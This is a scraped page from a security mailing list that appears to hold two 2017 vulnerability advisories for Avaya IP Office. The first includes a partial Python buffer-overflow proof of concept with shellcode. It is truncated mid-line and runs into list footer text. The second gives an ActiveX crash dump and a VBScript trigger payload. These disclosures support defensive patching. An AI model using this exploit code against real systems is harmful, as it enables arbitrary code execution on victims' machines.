[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt [+] ISR: apparitionSec Vendor: =www.avaya.com Product: === Avaya IP Office (IPO) v9.1.0 - 10.1 IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions. For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide improved customer service, and keep mobile employees accessible. Provides a hybrid PBX with TDM and IP telephony and trunk support. Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2). In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options. Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application). Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud. Vulnerability Type: === Remote Buffer Overflow CVE Reference: == CVE-2017-11309 ASA-2017-307 Security Issue: SoftConsole.exe does not check bounds when reading server response on making an outbound connection, resulting in a classic Buffer Overflow exploit. Avaya IP Office user must connect to a malicious server where a remote attacker can then deliver the buffer overflow payload in the server response, exploiting the SoftConsole client. This vulnerability allows attackers to deliver and execute arbitrary attacker supplied code on the Avaya host system. References: ===https://downloads.avaya.com/css/P8/documents/101044086 POC Video URL: ==https://vimeo.com/224679849 Exploit/POC: = import struct,socket #Log data, item 8 # Address=50E083A1 # Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604 #(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl) #50E083A1 #POP ECX POP EBP RET ''' No SafeSEH ''' HOST="127.0.0.1" PORT=80 #shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7) sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08" "\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B" "\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1" "\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53" "\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68" "\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5" "\xCC") ''' calculated by taking the negative of the number and convert to hex: in gdb 1 2 p/x -1116 $4 = 0xfba4 So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff. ''' seh=struct.pack("https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt [+] ISR: ApparitionSec Vendor: =www.avaya.com Product: === Avaya IP Office (IPO) v9.1.0 - 10.1 IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions. For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide improved customer service, and keep mobile employees accessible. Provides a hybrid PBX with TDM and IP telephony and trunk support. Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2). In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options. Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application). Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud. Vulnerability Type: ActiveX Remote Buffer Overflow CVE Reference: == CVE-2017-12969 ASA-2017-313 Security Issue: ViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered. Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334} Safe for Script: False Safe for Init: False ACCESS_VIOLATION 8C4A77 MOV EAX,[ECX] SEH Chain: --- 1 8D00A3 po.dll 2 36A7E95 CIPElements.dll 3 36A8115 CIPElements.dll 4 788719 ViewerCtrl.OCX 5 788533 ViewerCtrl.OCX 6 78862A ViewerCtrl.OCX 7 6008793E mfc90u.dll 8 60089B31 mfc90u.dll 9 779858C5 ntdll.dll (d360.1040c): Access violation - code c005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll - eax=0608ec18 ebx= ecx= edx= esi=0aa7bdd0 edi=0aa7bdd0 eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 po!cip::po::SpecialObjects::getPresetObject+0x77: 06064a77 8b01mov eax,dword ptr [ecx] ds:002b:= 0:008> !load winext/msec 0:008> !exploitable !exploitable 1.6.0.0 *** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at po!cip::po::SpecialObjects::getPresetObject+0x0077 (Hash=0x6f1f914b.0xc46b7285) The data from the faulting address is later used as the target for a branch. References: ==https://downloads.avaya.com/css/P8/documents/101044091 Exploit/POC: = victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact Center\User Interface\ViewerCtrl.ocx" prototype = "Function open ( ByVal containerId As String ) As Long" memberName = "open" progid = "ViewerCtrlLib.ViewerCtrl" argCount = 1 payload=String(5142, "A") victim.open payload Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: July 12, 2017 Vendor acknowlegement: July 14, 2017 CVE assigned by mitre : August 19, 2017 Vendor advisory : November 4, 2017 November 5, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and th